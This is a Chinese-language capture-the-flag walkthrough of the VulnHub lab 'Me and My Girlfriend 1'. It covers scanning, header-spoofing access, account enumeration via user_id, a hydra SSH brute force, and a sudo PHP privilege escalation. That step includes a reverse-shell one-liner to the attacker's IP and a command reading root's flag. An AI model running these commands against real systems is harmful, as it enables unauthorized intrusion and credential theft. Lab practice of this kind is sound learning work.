作者:forwhy 本文已经作者同意并授权

靶场地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

这个靶场很简单,算是自己独立完成的第一个靶场,(中间网上看了些资料,其实可以不看的,事后发现自己特傻*)在此记录一下

首先找一下靶机

arp-scan -l #查看同一网段主机

靶机地址:192.168.66.226

nmap 扫描一下端口

nmap -sV -sC -T4 192.168.66.226 -p-

-sV:扫描端口服务

-sC:使用默认脚本扫描

-T4:快速扫描

-p-:扫描全端口

只有两个端口,脑子里已经构思好攻击流程了,web端找漏洞,然后获取用户信息,ssh连接主机或者用九头蛇爆破一下,拿下shell再提权,先访问80端口

凭借着敏锐的直觉,查看一下页面源代码

作者给了提示,x-forwarded-for,我的物理机火狐上面有这个插件,直接用物理机访问一下,成功访问

在这里花费了十多分钟找注入,最后啥也没找到,只好拿着刚刚注册的账号登陆看一下

界面依旧十分简单,还是先找注入,又花了十多分钟,依旧啥也没有,这时候我想放弃了,但又不太甘心。

当我看着profile这个简单但又奇怪的界面时,男人的第六感告诉我这个界面一定有什么东西

我试着换一下id,当hackbar中的user_id从12变成1的时候,我并不期待他能带给我什么,这一步更像是一个理由,一个让我放弃的更加心安理得的理由,页面刷新的很快,没有给我多少思考的时间,当我看到这缺乏美感的Web界面和之前有些不太一样的时候,我很难形容那种感觉。

我仿佛一个上世纪五十年代的美国青年,开着一辆破旧的哈德逊行驶在弗罗里达一条宽阔的柏油路上,周围全是略微发黄的草地,风中夹杂着车上伙伴们的喊叫声,我们漫无目的的在这条望不到头的公路上游荡,却不用担心失去什么。我们一无所有却也乐在其中

好,有点跑题了,这里明显有账户信息遍历,先把账户信息都记下来(不断更换user_id来实现遍历)

按照前面的思路,我把这些信息账号和密码分开,用九头蛇跑一下22端口

hydra -L user.txt -P pass.txt ssh://192.168.1.7 -vv

-L :指定用户列表文件

-P:指定密码列表文件

-vv:显示破解过程详细信息

很快就跑出来了,这个靶场背景就是一个叫alice的女生在和bob谈恋爱的时候喜欢上了另一个男生

直接连一下

看到可疑文件夹.my_secret

那就让我们看一下这个alice究竟有什么秘密吧

她果然喜欢上了别的男人,

再看一下flag有什么提示

根据提示,这个靶场有两个flag,另一个就在root目录下

先试一下能不能suid提权

find / -perm -u=s -type f 2>/dev/null #

#这个suid提权我也讲不清楚,网上有很多讲解的可以搜一下

好像没有能suid提权的,那就看看有没有sudo提权的命令

sudo -l

有一个php,那接下来就很简单了,直接通过php反弹shell就可以了,但我在这卡了很久,我忘记sudo提权需要在命令前加上sudo了,实在太傻了,其实这里有很多种方法提权,或者查看root目录下的flag

我这里写两种

1.反弹shell

首先kali上开启监听

然后在靶机上执行命令

sudo php -r ‘$sock=fsockopen(“192.168.76.218”,8888);exec(“/bin/sh -i <&3 >&3 2>&3”);’

192.168.76.218 是kali ip

8888是kali监听的端口

成功反弹shell,查看flag

2.直接查看flag

sudo php -r “system(‘cat /root/flag2.txt’);”

其实借助php中的system方法有很多方法能够获取flag,这里就不一一列举,这个靶场过程很简单,但是之前的靶场都是需要看教程才能过,这个基本靠自己完成,记录下来纪念一下。